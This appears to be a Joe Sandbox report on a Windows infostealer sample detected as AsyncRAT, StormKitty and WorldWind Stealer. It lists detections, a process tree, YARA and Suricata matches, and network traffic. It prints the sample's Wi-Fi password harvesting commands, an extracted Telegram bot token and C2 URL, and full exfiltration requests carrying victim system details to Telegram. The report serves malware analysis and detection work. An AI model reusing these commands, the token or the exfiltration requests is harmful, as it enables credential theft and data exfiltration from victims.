Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cOH7jKmo25.exe

Overview

General Information

Sample name:cOH7jKmo25.exe
renamed because original name is a hash value
Original sample name:153a321e178bc28e0f2c6432763bb44fc47b573596387ec241ca45d8775e12af.exe
Analysis ID:1588314
MD5:f69889d705f5d72d65661b48535ae1b3
SHA1:4c8f3cf14130e6519339a370bba4527ecb012cde
SHA256:153a321e178bc28e0f2c6432763bb44fc47b573596387ec241ca45d8775e12af
Tags:AsyncRATexeuser-adrian__luca
Infos:

Detection

AsyncRAT, StormKitty, WorldWind Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
Yara detected AsyncRAT
Yara detected StormKitty Stealer
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected WorldWind Stealer
AI detected suspicious sample
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses netsh to modify the Windows network and firewall settings
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious desktop.ini Action
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • cOH7jKmo25.exe (PID: 7540 cmdline: "C:\Users\user\Desktop\cOH7jKmo25.exe" MD5: F69889D705F5D72D65661B48535AE1B3)
    • cmd.exe (PID: 7736 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7784 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
      • netsh.exe (PID: 7800 cmdline: netsh wlan show profile MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • findstr.exe (PID: 7808 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
    • cmd.exe (PID: 7848 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7896 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
      • netsh.exe (PID: 7912 cmdline: netsh wlan show networks mode=bssid MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
NameDescriptionAttributionBlogpost URLsLink
Cameleon, StormKittyPWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon
{"C2 url": "https://api.telegram.org/bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage"}
{"Server": "127.0.0.1", "Ports": "6606,7707,8808"}
SourceRuleDescriptionAuthorStrings
cOH7jKmo25.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
    cOH7jKmo25.exeJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
      cOH7jKmo25.exeJoeSecurity_StormKittyYara detected StormKitty StealerJoe Security
        cOH7jKmo25.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          cOH7jKmo25.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
            Click to see the 8 entries
            SourceRuleDescriptionAuthorStrings
            00000000.00000000.1315479015.00000000007E2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
              00000000.00000000.1315479015.00000000007E2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_StormKittyYara detected StormKitty StealerJoe Security
                00000000.00000000.1315479015.00000000007E2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  00000000.00000000.1315479015.00000000007E2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    00000000.00000000.1315479015.00000000007E2000.00000002.00000001.01000000.00000003.sdmpINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
                    • 0x28ee2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
                    Click to see the 11 entries
                    SourceRuleDescriptionAuthorStrings
                    0.0.cOH7jKmo25.exe.7e0000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                      0.0.cOH7jKmo25.exe.7e0000.0.unpackJoeSecurity_StormKittyYara detected StormKitty StealerJoe Security
                        0.0.cOH7jKmo25.exe.7e0000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                          0.0.cOH7jKmo25.exe.7e0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                            0.0.cOH7jKmo25.exe.7e0000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                              Click to see the 7 entries

                              System Summary

                              barindex
                              Source: File createdAuthor: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO): Data: EventID: 11, Image: C:\Users\user\Desktop\cOH7jKmo25.exe, ProcessId: 7540, TargetFilename: C:\Users\user\AppData\Local\e40d0e63b27ae1bdf03271cbddc24ff7\user@302494_en-CH\Grabber\DRIVE-C\Users\user\Pictures\desktop.ini

                              Stealing of Sensitive Information

                              barindex
                              Source: Process startedAuthor: Joe Security: Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\cOH7jKmo25.exe", ParentImage: C:\Users\user\Desktop\cOH7jKmo25.exe, ParentProcessId: 7540, ParentProcessName: cOH7jKmo25.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 7736, ProcessName: cmd.exe
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-01-10T23:53:50.405005+010020310091Malware Command and Control Activity Detected192.168.2.949796149.154.167.220443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-01-10T23:53:50.405005+010020447661A Network Trojan was detected192.168.2.949796149.154.167.220443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-01-10T23:53:51.476326+010028033053Unknown Traffic192.168.2.949806149.154.167.220443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-01-10T23:53:50.405005+010018100071Potentially Bad Traffic192.168.2.949796149.154.167.220443TCP
                              2025-01-10T23:53:51.476326+010018100071Potentially Bad Traffic192.168.2.949806149.154.167.220443TCP

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Source: cOH7jKmo25.exeMalware Configuration Extractor: AsyncRAT {"Server": "127.0.0.1", "Ports": "6606,7707,8808"}
                              Source: cOH7jKmo25.exe.7540.0.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage"}
                              Source: cOH7jKmo25.exeReversingLabs: Detection: 91%
                              Source: cOH7jKmo25.exeVirustotal: Detection: 81%Perma Link
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                              Source: cOH7jKmo25.exeJoe Sandbox ML: detected
                              Source: cOH7jKmo25.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: unknownHTTPS traffic detected: 104.21.44.66:443 -> 192.168.2.9:49794 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49796 version: TLS 1.2
                              Source: cOH7jKmo25.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: Binary string: winload_prod.pdb source: Temp.txt.0.dr
                              Source: Binary string: ntkrnlmp.pdb source: Temp.txt.0.dr
                              Source: Binary string: winload_prod.pdb\ source: Temp.txt.0.dr
                              Source: Binary string: ntkrnlmp.pdb\ source: Temp.txt.0.dr

                              Networking

                              barindex
                              Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.9:49796 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 2031009 - Severity 1 - ET MALWARE StormKitty Data Exfil via Telegram : 192.168.2.9:49796 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 2044766 - Severity 1 - ET MALWARE WorldWind Stealer Checkin via Telegram (GET) : 192.168.2.9:49796 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.9:49806 -> 149.154.167.220:443
                              Source: unknownDNS query: name: api.telegram.org
                              Source: Yara matchFile source: cOH7jKmo25.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.cOH7jKmo25.exe.7e0000.0.unpack, type: UNPACKEDPE
                              Source: global trafficHTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=5287158069&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202025-01-10%205:53:38%20pm%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20302494%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20282H_%0ARAM:%204095MB%0AHWID:%20C344724773%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.189%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%201%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=5287158069&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
                              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
                              Source: Joe Sandbox ViewIP Address: 104.21.44.66 104.21.44.66
                              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                              Source: Joe Sandbox ViewIP Address: 104.16.184.241 104.16.184.241
                              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                              Source: unknownDNS query: name: icanhazip.com
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49806 -> 149.154.167.220:443
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficHTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=5287158069&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202025-01-10%205:53:38%20pm%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20302494%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20282H_%0ARAM:%204095MB%0AHWID:%20C344724773%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.189%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%201%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=5287158069&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
                              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
                              Source: global trafficDNS traffic detected: DNS query: 158.157.4.0.in-addr.arpa
                              Source: global trafficDNS traffic detected: DNS query: icanhazip.com
                              Source: global trafficDNS traffic detected: DNS query: api.mylnikov.org
                              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.18.0Date: Fri, 10 Jan 2025 22:53:50 GMTContent-Type: application/jsonContent-Length: 84Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.18.0Date: Fri, 10 Jan 2025 22:53:51 GMTContent-Type: application/jsonContent-Length: 84Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                              Source: cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.mylnikov.org
                              Source: cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.mylnikov.orgd
                              Source: cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp, cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002F90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                              Source: cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp, cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002F90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.orgd
                              Source: cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002D7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com
                              Source: cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002D7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com/
                              Source: cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002D7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com/t
                              Source: cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002E8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.comd
                              Source: cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002D7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: tmpA739.tmp.dat.0.dr, tmpA6E7.tmp.dat.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                              Source: cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002E8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.mylnikov.org
                              Source: cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002E8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&
                              Source: cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002E8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=
                              Source: cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002E8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15
                              Source: cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002E8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15d
                              Source: cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002D7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.tele
                              Source: cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp, cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002F90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                              Source: cOH7jKmo25.exeString found in binary or memory: https://api.telegram.org/bot
                              Source: cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002F90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage
                              Source: cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002F23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=52871
                              Source: cOH7jKmo25.exeString found in binary or memory: https://api.telegram.org/file/bot
                              Source: cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002F90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.orgd
                              Source: tmpA739.tmp.dat.0.dr, tmpA6E7.tmp.dat.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                              Source: tmpA739.tmp.dat.0.dr, tmpA6E7.tmp.dat.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                              Source: tmpA739.tmp.dat.0.dr, tmpA6E7.tmp.dat.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                              Source: tmpA739.tmp.dat.0.dr, tmpA6E7.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                              Source: tmpA739.tmp.dat.0.dr, tmpA6E7.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                              Source: tmpA739.tmp.dat.0.dr, tmpA6E7.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                              Source: cOH7jKmo25.exeString found in binary or memory: https://github.com/LimerBoy/StormKitty
                              Source: cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/LimerBoy/StormKitty0&
                              Source: cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002D7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/LimerBoy/StormKittyTC
                              Source: cOH7jKmo25.exeString found in binary or memory: https://pastebin.com/raw/7B75u64B
                              Source: cOH7jKmo25.exeString found in binary or memory: https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13
                              Source: tmpA839.tmp.dat.0.drString found in binary or memory: https://support.mozilla.org
                              Source: tmpA839.tmp.dat.0.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                              Source: tmpA839.tmp.dat.0.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GNzbMA16ssY5
                              Source: tmpA739.tmp.dat.0.dr, tmpA6E7.tmp.dat.0.drString found in binary or memory: https://www.ecosia.org/newtab/
                              Source: tmpA739.tmp.dat.0.dr, tmpA6E7.tmp.dat.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                              Source: tmpA839.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org
                              Source: tmpA839.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
                              Source: tmpA839.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
                              Source: History.txt.0.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/)
                              Source: places.raw.0.dr, tmpA839.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                              Source: tmpA839.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                              Source: places.raw.0.dr, tmpA839.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                              Source: places.raw.0.dr, tmpA839.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                              Source: unknownHTTPS traffic detected: 104.21.44.66:443 -> 192.168.2.9:49794 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49796 version: TLS 1.2

                              Key, Mouse, Clipboard, Microphone and Screen Capturing

                              barindex
                              Source: Yara matchFile source: cOH7jKmo25.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.cOH7jKmo25.exe.7e0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1315479015.00000000007E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: cOH7jKmo25.exe PID: 7540, type: MEMORYSTR

                              System Summary

                              barindex
                              Source: cOH7jKmo25.exe, type: SAMPLEMatched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
                              Source: cOH7jKmo25.exe, type: SAMPLEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
                              Source: cOH7jKmo25.exe, type: SAMPLEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                              Source: cOH7jKmo25.exe, type: SAMPLEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                              Source: cOH7jKmo25.exe, type: SAMPLEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                              Source: cOH7jKmo25.exe, type: SAMPLEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                              Source: cOH7jKmo25.exe, type: SAMPLEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                              Source: 0.0.cOH7jKmo25.exe.7e0000.0.unpack, type: UNPACKEDPEMatched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
                              Source: 0.0.cOH7jKmo25.exe.7e0000.0.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
                              Source: 0.0.cOH7jKmo25.exe.7e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                              Source: 0.0.cOH7jKmo25.exe.7e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                              Source: 0.0.cOH7jKmo25.exe.7e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                              Source: 0.0.cOH7jKmo25.exe.7e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                              Source: 0.0.cOH7jKmo25.exe.7e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
